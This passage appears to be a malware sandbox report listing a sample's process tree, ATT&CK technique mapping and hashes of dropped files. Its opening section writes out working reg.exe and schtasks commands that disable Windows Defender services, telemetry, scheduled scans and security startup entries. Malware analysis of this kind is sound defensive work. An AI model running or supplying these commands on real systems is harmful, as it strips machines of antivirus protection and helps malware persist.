    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f├é┬┤
    3⤵
    PID:3000
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:4300
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:4208
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:2660
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:4808
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:4604
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:1800
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:2548
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:2392
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:4772
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:3708
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:5028
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:5064
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:3392
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:3828
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:4964
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:2260
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    PID:1916
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:4332
- C:\Windows\SYSTEM32\cscript.exe
  cscript C:\Users\Admin\AppData\Local\Temp\2058761778\lC23uVadRE4m.vbs
  2⤵
  PID:3512
- - C:\Users\Admin\AppData\Local\Temp\2058761778\n8gPh5FKmGRU.exe
    "C:\Users\Admin\AppData\Local\Temp\2058761778\n8gPh5FKmGRU.exe"
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - Sets desktop wallpaper using registry
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Modifies Control Panel
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4220
  - - C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      4⤵
      Drops file in System32 directory
      PID:2344
  - - C:\ProgramData\6E90.tmp
      "C:\ProgramData\6E90.tmp"
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:856
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\6E90.tmp >> NUL
        5⤵
        
        PID:2656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
PID:5020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:2308

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
- Drops file in System32 directory
PID:900
- C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
  /insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{FEDF9260-0386-4EEB-81F6-A05ABA492DCF}.xps" 133328635963360000
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:60
- - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
    "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 3472
    3⤵
    - Process spawned suspicious child process
    PID:4228
  - - C:\Windows\system32\dwwin.exe
      C:\Windows\system32\dwwin.exe -x -s 3472
      4⤵
      PID:5072

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

BITS Jobs

T1197

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\AAAAAAAAAAA

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\BBBBBBBBBBB

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\CCCCCCCCCCC

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\DDDDDDDDDDD

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\DDDDDDDDDDD

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\EEEEEEEEEEE

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\FFFFFFFFFFF

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\GGGGGGGGGGG

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\HHHHHHHHHHH

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\IIIIIIIIIII

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\JJJJJJJJJJJ

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\KKKKKKKKKKK

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\LLLLLLLLLLL

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\MMMMMMMMMMM

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\NNNNNNNNNNN

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\OOOOOOOOOOO

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\PPPPPPPPPPP

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\QQQQQQQQQQQ

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\RRRRRRRRRRR

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\SSSSSSSSSSS

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\TTTTTTTTTTT

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\UUUUUUUUUUU

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\VVVVVVVVVVV

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\WWWWWWWWWWW

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\XXXXXXXXXXX

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\YYYYYYYYYYY

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\$Recycle.Bin\S-1-5-21-1722984668-1829624581-3022101259-1000\desktop.ini

Filesize
129B

MD5
d3629f822a32140d4d4a8f724db52b94

SHA1
594f01269118d9ae9f0c1c1e3eed8a852f85caf6

SHA256
327b1972efa959999e76b47d02448ce6431685e1dc7a5bcb3e392bf5f00587e6

SHA512
b34427a9522800261191fb0a6268d99315f36e8c2d4415fc2f08f356fa7335c29fe7a2d7455118019a76810c01b2cf031a6cbfe55f7444a923d8c57d800b0abd

Download Submit
C:\ProgramData\6E90.tmp

Filesize
14KB

MD5
294e9f64cb1642dd89229fff0592856b

SHA1
97b148c27f3da29ba7b18d6aee8a0db9102f47c9

SHA256
917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

SHA512
b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

Download Submit
C:\ProgramData\6E90.tmp

Filesize
14KB

MD5
294e9f64cb1642dd89229fff0592856b

SHA1
97b148c27f3da29ba7b18d6aee8a0db9102f47c9

SHA256
917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2

SHA512
b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fe3aab3ae544a134b68e881b82b70169

SHA1
926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6

SHA256
bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b

SHA512
3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0912bdcdbfa8d76ed3ab2ff4d8aa479d

SHA1
5a4debb7128aff994c0f1024f62e7aa5714352c8

SHA256
00e4b652fa67392304e72b044806f909ac2ede9efed271f304e060b13ee1da1e

SHA512
f276b688c1661fcebec6750637329256ef166b57527066c5bdc70bdb9fa4959d446e240d1b0ee80ef4491c796c1afe23e18833f29f37e335083c62ccb91d90ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
14ee7afd5d4a6cb282808cb5ca2ab069

SHA1
c53d583770d229f61d3e057fc26dfa58897a4619

SHA256
a20c2903bcc484cb6ffc4003cd93e16ee6a891db85fd113865a5857cc6f97e8d

SHA512
989b24ec7aca25cdd86f481ab3194caef2ffb4f09ab1377b73358542393a921f34e3825125ef86d603ad87555d32ada23a26fa45c5df471d06e81ebc7659e9db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
07a996065cac786eff9cf6c0f3673738

SHA1
08352823b2ff70f942752fd9533b633c38246206

SHA256
e6fff896d7f0ec392b478e3bc4628fa7c5e7fcfd937056c1b7cebf5dcb9b58bd

SHA512
428aadd294a4e25dc71ba5c38a0273b45797b995ff57172c05761a8f3d70ce704be92f6611e7bf8e8d9fafa726c8e2b4b74bc0e3fa8169c29051150e0e9fda3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
38f0f14cc7ca72ad51216866e66efb4e

SHA1
34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

SHA256
668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

SHA512
4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e907f77659a6601fcc408274894da2e

SHA1
9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

SHA256
385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

SHA512
34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
855f303c885b9cbf796dc1e11a2a3ae2

SHA1
9046578188982d0baa524bfa717234d5b67d578f

SHA256
6215c5b9e52295ecb7f5fb6434ab87d780fa91c536c39d5b003611ecbb5e9fc6

SHA512
cda36c06a6848aac9386a36ed01da2c9fc0cc360ed98937654c55e8a8d550fcb1bb9a55d2cc5a7cbd64484164b5cd72fadc1562fbc1e0c537abe0fad9d57133e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4aaea8e990963328115bd59dee2bcda8

SHA1
2d7eed0a0a898811d6a149a4545ab3732477c01a

SHA256
d9409a92c971fffde4ef29a4777990224d362ae8d847b583a7bd01b5d80394cc

SHA512
de1b4cd2633996f20d8967a55c654c902f94080ba4d002c8d7fd473d077b5c26d4b3c8064a3c69a9485074560f25764225f42aadde352633f96326ee521fbd50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
1e9c4a3d96554be6eb3c5e6f870abe02

SHA1
f52f7ff8d5588fe3996f6c9623a2fe103c7c2b3c

SHA256
6f034711d5dc484207a736d36d2ddffec160579b05e2b2f5a3dbabead1e12e50

SHA512
ad83a3c56a21b112465d025f7f411710acbedeea980c5afdf48d5af0dd5783b2ef259b2dd793f92cc68b69cb1aa9d262d8d15007273b50dfce8a89e238109fd5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
85eb515a79f9dcf83eb7d13b96ede393

SHA1
ccc50d56367ff054a2fe0e9d178f3d05ac8876c9

SHA256
1eefc4cf7ffd11daa0852534c2478bbe398714917878c309e7f1e215b23508b7

SHA512
e9fde0286b41240c967f6e573a0d18ac031440d6f22dac83ff90c592e0296104fc091eccf8eb6a76ece95ad31340c58d429013fb2102c10eee206a823076ee1b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6e48d487485ecc7d5f677f7aa07a6af8

SHA1
1d16f4e4a243bc62f91dfd7cee47fef9618cf2eb

SHA256
13f6be85dd43eda22a81e91db2a490f505061e92871b517e9846e97e162ae121

SHA512
a7d3b2e7504523667825e630049f7a5a9e6c8199ab2437d5c28bdf2f7b97a45d15761f3e3ce0afe945a388b344cef52e76d84d6656acf73098ed3598ce93b60b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
393b0dd912015db6b9f455c13c931b61

SHA1
423466b784b87d0924a441df0b201be898972d5f

SHA256
a36a9813bf3b96ead474179b0a07fd96e13abc1920eb0a4828eca5fc34a27d12

SHA512
b96f994b5a40b1e618886813cb5e2486ec0237de7d892ca10dbf7f441733b5161b30343de96e5b6df783373e02f14e41db5a5e63bed0aaaf907d1fb115041e0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6e48d487485ecc7d5f677f7aa07a6af8

SHA1
1d16f4e4a243bc62f91dfd7cee47fef9618cf2eb

SHA256
13f6be85dd43eda22a81e91db2a490f505061e92871b517e9846e97e162ae121

SHA512
a7d3b2e7504523667825e630049f7a5a9e6c8199ab2437d5c28bdf2f7b97a45d15761f3e3ce0afe945a388b344cef52e76d84d6656acf73098ed3598ce93b60b

Download Submit
C:\Users\Admin\AppData\Local\Temp\2058761778\AZaXE6ObqtQH.bat

Filesize
6KB

MD5
b29d896eeb1a86b55e6a3d4b83ec1416

SHA1
d76a3b87582292e1e63a34d1faefee2d546ffad5

SHA256
fed83511fc4acff537ad1f9c4db5dec4435e0f3e30211ddacaa86889e80953fa

SHA512
a0c3dc735d70479bbdd4ace8f839fee90e6cca31b660cae071a0225d7fba06862d71686fa5142ae324f1553d079375fc1d44bae781e366ab68addaabf83a92d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\2058761778\DDDDDDDDDDDDDDDD

Filesize
149KB

MD5
63dbe081127c4c41babb0a93256fffe3

SHA1
e0dabf8b8ac9a2c83367f555239f223f451afd4b

SHA256
477697454b78471eca8f8a3a84641a19d1773536daf8e56656f5c4155f4d1125

SHA512
c7095f822d8d3050c690a3eb8d24c6d864d2b9585e800b733bfc909a10c9f89b5523db86d7fd802a22d85691c6416d78b4eaa53ec0bd771f907265dfac6b83cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\2058761778\lC23uVadRE4m.vbs

Filesize
416B

MD5
98917ff72ac13ed3c69e4a1f69f5c071

SHA1
0229b2e758113779d86e65f9e8bc0eea202fa03a

SHA256
7e9ffb759c3c64b6e99699f85a70f7f4b847ac372ee710d2dd080452ef27e1e3

SHA512
d36bf504203273705d9cdbb7a8681da21ee974aaae3395deffaf502996816bb9285d95c5ffde9e9d645ac83d0e24f6708872a0cfff6231e6c998a49bc83c1e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\2058761778\n8gPh5FKmGRU.exe

Filesize
149KB

MD5
734cee97a335632f53f4d325848efcd7

SHA1
941fe2aa7b799380020bda118d2f85892f52c3c7

SHA256
25f9e2bb5312f3ba8d593529546402d91460720239805502c8ce29582c922036

SHA512
01864dd4415bf56f78fd14adf157b307d5c36f888b59ec79a0174307e0d4ccb12cd5650f03e32108b83039da3875e76ded213286682ab0346be116d717bd178e

Download Submit
